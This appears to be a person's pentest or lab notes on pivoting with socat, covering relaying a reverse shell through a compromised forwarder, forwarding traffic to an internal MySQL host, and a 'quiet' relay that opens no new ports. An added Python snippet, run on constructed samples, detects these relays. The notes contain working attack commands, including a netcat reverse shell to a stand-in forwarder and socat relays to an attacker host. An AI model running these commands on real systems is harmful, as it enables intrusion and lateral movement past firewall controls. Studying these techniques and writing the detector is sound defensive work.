
  1. socat listens on the public-facing machine for a reverse shell from the internal network, then forwards that shell back to our attacker machine.

Steps:

  1. Create an nc listener on the attacker machine: nc -nvlp 8008.
  2. On the forwarder: ./socat tcp-l:34125 tcp:ATTACKERIP:PORT & (PORT is the port the nc listener from step 1 is on).
  3. On the internal target, execute a reverse shell back to our forwarder: nc FORWARDERIP 34125 -e /bin/bash.
  4. The reverse shell now arrives on our ATTACKER machine.

Forwarding our network to the other victim:

  1. On the compromised forwarder: ./socat tcp-l:33060,fork,reuseaddr tcp:172.16.0.10:3306 &. This routes whatever comes into port 33060 on the forwarder to 172.16.0.10:3306.
  2. firewall-cmd --zone=public --add-port PORT/tcp, so that the forwarder's firewall accepts inbound connections to the new listening port (33060 here).
  3. This is similar to ssh -L 33060:172.16.0.10:3306 USER@FORWARDERIP -fN.

Forwarding Quietly~~~ Shushhhh

  1. Previously we opened a new port on the forwarder; this time we will not.
  2. On our ATTACKER machine, run socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &. This opens two ports on our ATTACKER machine, 8001 and 8000, as a local port relay: whatever goes into one comes out the other. Port 8000 also has the fork and reuseaddr options set, so more than one connection can use this port forward.
  3. On the compromised relay server: ./socat tcp:ATTACKING_IP:8001 tcp:TARGET:TARGET_PORT,fork &. This connects our listening port 8001 on the attacking machine to the open port on the target server, so a connection to port 8000 on the attacking machine ends up at the target. Because the relay server only makes outbound connections, it opens no new listening port and needs no firewall change.
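Added example (not part of the original notes): a small Python check a defender can run on a suspected forwarder to spot the footprints the two relay styles above leave, a socat/nc process bound to a listening port plus a port newly opened in firewalld's public zone for the loud variant, and a socat/nc process holding only outbound connections for the quiet one. The `ss -tnap` and `firewall-cmd --zone=public --list-ports` outputs below are constructed samples, and the baseline set of expected ports is an assumption.

```python
import re
# Constructed sample of `ss -tnap` from a suspected forwarder host (not a real capture).
SS_SAMPLE = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port   Process
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*           users:(("sshd",pid=812,fd=3))
LISTEN 0      5      0.0.0.0:33060       0.0.0.0:*           users:(("socat",pid=4420,fd=5))
LISTEN 0      128    127.0.0.1:3306      0.0.0.0:*           users:(("mysqld",pid=1201,fd=20))
ESTAB  0      0      10.200.0.5:51022    203.0.113.7:8001    users:(("socat",pid=4501,fd=3))
ESTAB  0      0      10.200.0.5:51023    172.16.0.10:3306    users:(("socat",pid=4501,fd=4))
"""
# Constructed sample of `firewall-cmd --zone=public --list-ports` on the same host.
FW_PORTS_SAMPLE = "33060/tcp"

RELAY_TOOLS = {"socat", "nc", "ncat", "netcat"}  # binaries commonly used as TCP relays
BASELINE_PORTS = {22}                            # assumed: ports expected to be exposed here
SOCK_RE = re.compile(r'^(LISTEN|ESTAB)\s+\d+\s+\d+\s+(\S+):(\d+)\s+(\S+):(\S+)\s+users:\(\("([^"]+)",pid=(\d+)')

def parse_sockets(ss_output):
    """Turn `ss -tnap` lines into dicts; the header and unparseable lines are skipped."""
    rows = []
    for line in ss_output.splitlines():
        m = SOCK_RE.match(line)
        if m:
            state, laddr, lport, paddr, pport, proc, pid = m.groups()
            rows.append({"state": state, "laddr": laddr, "lport": int(lport), "peer": paddr + ":" + pport,
                         "proc": proc, "pid": int(pid)})
    return rows

def find_relay_sockets(rows, baseline=BASELINE_PORTS):
    """Flag listeners owned by a relay tool or exposed on a non-baseline port, and any socket held by a relay tool."""
    findings = []
    for r in rows:
        reasons = []
        if r["proc"] in RELAY_TOOLS:
            reasons.append("relay tool " + r["proc"])
        if r["state"] == "LISTEN" and r["laddr"] in ("0.0.0.0", "*", "[::]") and r["lport"] not in baseline:
            reasons.append("non-baseline external listener")
        if reasons:
            findings.append((r["state"], r["lport"], r["peer"], r["proc"], r["pid"], "; ".join(reasons)))
    return findings

def unexpected_fw_ports(list_ports_output, baseline=BASELINE_PORTS):
    """TCP ports opened in firewalld's public zone that are not in the baseline."""
    ports = set()
    for tok in list_ports_output.split():
        num, _, proto = tok.partition("/")
        if proto == "tcp" and num.isdigit() and int(num) not in baseline:
            ports.add(int(num))
    return sorted(ports)
```

The ESTAB rows are what the quiet variant looks like from the forwarder: no listener at all, only a relay process with one connection out to the attacker's port 8001 and one to the internal target.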

Quiet flow